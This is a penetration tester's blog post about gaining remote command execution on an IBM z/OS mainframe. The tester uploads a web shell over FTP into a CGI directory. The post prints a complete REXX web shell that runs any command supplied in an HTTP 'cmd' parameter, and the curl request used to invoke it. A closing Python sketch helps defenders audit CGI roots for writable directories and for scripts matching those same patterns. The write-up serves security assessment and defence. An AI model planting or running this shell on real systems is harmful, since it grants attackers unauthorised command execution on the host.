Wednesday, June 22, 2016 At 2:58PM
Recently I was conducting a mainframe assessment (z/OS), and the application account I had access to was able to FTP directly to the system. There were also multiple web servers listening on the host, so I used web shell planting tactics to gain remote command execution — albeit with an uncommon scripting language (REXX).
Typically when you FTP to an IBM mainframe you will find yourself in the Multiple Virtual Storage (MVS) file system. This is indicated by “Remote system type is MVS” in the FTP response message.
It’s possible to change to a Unix-like file system, Hierarchical File System (HFS), to make it easier to understand (at least for me!). This can be accomplished by executing a simple change directory command using FTP.
Change to HFS
ftp> cd /
250 HFS directory / is the current working directory
After identifying this access, I trawled through the more familiar file system and came across a CGI web root that permitted the execution of REXX scripts. REXX is an interpreted scripting language developed by IBM that dates back to the beginning of the 80s.
After creating a simple REXX web shell, I was able to upload the shell to the web root and chmod it with the appropriate permissions.
REXX Web Shell
/* rexx */
'cgiutils -status 200 -ct text/x-ssi-html'
address syscall 'pipe p.'
'cgiparse -f > /dev/fd' || p.2
address syscall 'close' p.2
address mvs 'execio 1 diskr' p.1 '(stem s.'
interpret s.1
do i=1 to 100 until s.1=''
  parse var s.1 parm.i.1 '=' parm.i.2 '&' s.1
  if parm.i.1 = 'FORM_cmd' then do
    cmd = parm.i.2
    cmd = STRIP(cmd, ,"'")
  end
end
say 'Running as ' || USERID()
say 'Executing the following command... "' || cmd || '"'
address syscall 'pipe p.'
cmd || ' >/dev/fd'||p.2
address syscall 'close' p.2
address mvs 'execio * diskr' p.1 '(stem s.'
do i=1 to s.0
  say s.i
end
return
Finally, by sending a command to be executed in the cmd HTTP request parameter, I was able to gain command execution on the system as the WWWPUB user. Although there was FTP access, it is much easier to enumerate and attack the system given interactive execution of commands and this also provided different access permissions.
The script can be executed like so:
$ curl http://host/cgi/foo/cmd.rexx --data-urlencode 'cmd=id'
Here we can see an example of the ps -ef command being executed by the WWWPUB user in the CGI directory.
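From the defender's side, the conditions that made this work (a CGI root that can be written to, and an executable REXX script that passes request input to command execution) can be audited for. The following Python sketch is an added example, not part of the original post; the match patterns, the 7-day window and the cp037 EBCDIC fallback are assumptions chosen for illustration.

```python
import os, re, stat, time

# Heuristic patterns (assumptions for this example, tune for your site).
REXX_MARK = re.compile(r"^\s*/\*.*rexx.*\*/", re.I)   # first-line REXX comment
RISKY = {
    "reads CGI form input": re.compile(r"\bcgiparse\b", re.I),
    "evaluates data with INTERPRET": re.compile(r"^\s*interpret\b", re.I | re.M),
    "runs commands via ADDRESS SYSCALL pipe": re.compile(r"address\s+syscall\s+'pipe", re.I),
}

def decode(raw):
    """Candidate decodings: HFS files may be ASCII or EBCDIC (NL decodes to U+0085)."""
    return [raw.decode("latin-1"), raw.decode("cp037").replace("\x85", "\n")]

def inspect_script(path, now=None, recent_days=7):
    """Return findings for one file; an empty list if it is not REXX or looks benign."""
    with open(path, "rb") as fh:
        raw = fh.read(65536)
    text = next((t for t in decode(raw) if REXX_MARK.match(t)), None)
    if text is None:
        return []
    st = os.stat(path)
    findings = [label for label, rx in RISKY.items() if rx.search(text)]
    if st.st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
        findings.append("executable")
    if (now or time.time()) - st.st_mtime < recent_days * 86400:
        findings.append("modified in last %d days" % recent_days)
    return findings

def audit_cgi_root(root, now=None):
    """Walk a CGI root and report writable directories and suspicious REXX scripts."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        mode = os.stat(dirpath).st_mode
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            report[dirpath] = ["directory is group/world-writable"]
        for name in files:
            path = os.path.join(dirpath, name)
            found = inspect_script(path, now)
            if found:
                report[path] = found
    return report
```

Run audit_cgi_root against each web server's CGI directory and review every reported path against what the application is known to deploy.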
Author: Sam Bertram